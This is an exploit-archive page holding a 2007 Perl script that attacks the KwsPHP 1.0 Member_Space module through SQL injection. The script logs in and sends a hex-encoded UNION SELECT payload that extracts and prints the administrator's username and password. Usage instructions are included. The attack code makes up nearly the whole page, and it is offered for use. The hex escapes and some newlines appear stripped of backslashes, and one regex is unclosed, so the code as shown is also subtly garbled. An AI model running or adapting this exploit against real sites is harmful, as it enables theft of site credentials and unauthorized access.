KwsPHP 1.0 Member_Space Module SQL Injection Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : KwsPHP 1.0 Member_Space Module SQL Injection Exploit
# Published : 2007-09-15
# Author : s4mi
# Previous Title : KwsPHP 1.0 (login.php) Remote SQL Injection Exploit
# Next Title : KwsPHP 1.0 stats Module Remote SQL Injection Exploit

#!/usr/bin/perl

use LWP::UserAgent;
use HTTP::Cookies;

$host = $ARGV[0];
$User = $ARGV[1];
$passwd = $ARGV[2];
$url = "http://".$host;
$port = "80";

 print q(
################################################################
#  Script....................: KwsPHP v1.0 Member_Space Module #
#  Script Site...............: http://kws.koogar.org/          #
#  Vulnerability.............: Remote SQL injection Exploit    #
#  Access....................: Remote                          #
#  level.....................: Dangerous                       #
#  Author....................: S4mi                            #
#  Contact...................: S4mi[at]LinuxMail.org           #
#        This Exploit Work Only When magic_quotes_gpc Is OFF   #
################### (C)oded By S4mi ############################

);


 if (@ARGV < 3) {
 print " #  usage : xpl.pl   host/path/     User Passwdn";
 print " #    e.g : xpl.pl 127.0.0.1/KwsPHP/ zaz luksn";
 exit();
 }

   print " [~] User/Password : $User/$passwd n";
   print " [~] Host : $url n";

 $xpl = LWP::UserAgent->new() or die;
 $cookie_jar = HTTP::Cookies->new();
 print " [~] Logining ...n";
 $xpl->cookie_jar( $cookie_jar );
 $login = $xpl->post($url.'index.php',
 Content => [
 "pseudo" => "$User",
 "pass" => "$passwd",
 "submit" => "Se connecter",
 ],); 
 
$evil0 = "x39x39x39x39x39x27x2Fx2Ax2Ax2Fx55x4Ex49x4Fx4E"
		."x2Fx2Ax2Ax2Fx53x45x4Cx45x43x54x2Fx2Ax2Ax2Fx6E"
		."x75x6Cx6Cx2Cx63x6Fx6Ex63x61x74x28x63x68x61x72"
		."x28x31x31x37x2Cx31x31x35x2Cx31x30x31x2Cx31x31"
		."x34x2Cx31x31x30x2Cx39x37x2Cx31x30x39x2Cx31x30"
		."x31x2Cx35x38x29x2Cx70x73x65x75x64x6Fx2Cx63x68"
		."x61x72x28x31x32x37x29x29x2Cx63x6Fx6Ex63x61x74"
		."x28x63x68x61x72x28x31x31x32x2Cx39x37x2Cx31x31"
		."x35x2Cx31x31x35x2Cx31x31x39x2Cx31x31x31x2Cx31"
		."x31x34x2Cx31x30x30x2Cx35x38x29x2Cx70x61x73x73"
		."x2Cx63x68x61x72x28x31x32x37x29x29x2Cx6Ex75x6C"
		."x6Cx2Fx2Ax2Ax2Fx46x52x4Fx4Dx2Fx2Ax2Ax2Fx75x73"
		."x65x72x73x2Fx2Ax2Ax2Fx57x48x45x52x45x2Fx2Ax2A"
		."x2Fx69x64x3Dx31x2Fx2A";

$offset = "x65x73x70x61x63x65x5Fx6Dx65x6Dx62x72x65x26x61"
		 ."x63x3Dx63x61x72x6Ex65x74x26x61x63x74x3Dx65x64"
		 ."x69x74x65x72x26x69x64x3D";

$target = $xpl->get($url."index.php?mod=$offset$evil0");



if($target->as_string =~ /value="username:(.*?"/) {
$zaz = $1;
print " [+] Exploit succeed! Getting admin information. n";
print " [+] ------------------------------------------- n";
}
if($target->as_string =~ /value="password:(.*?"/) {
$luks = $1;
print " [+] UserName : $zaz n";
print " [+] Password : $luks n";
}
else {
print " [-] Exploit Failed ! n";
}
print "n#############################################################n";

# www.Syue.com [2007-09-15]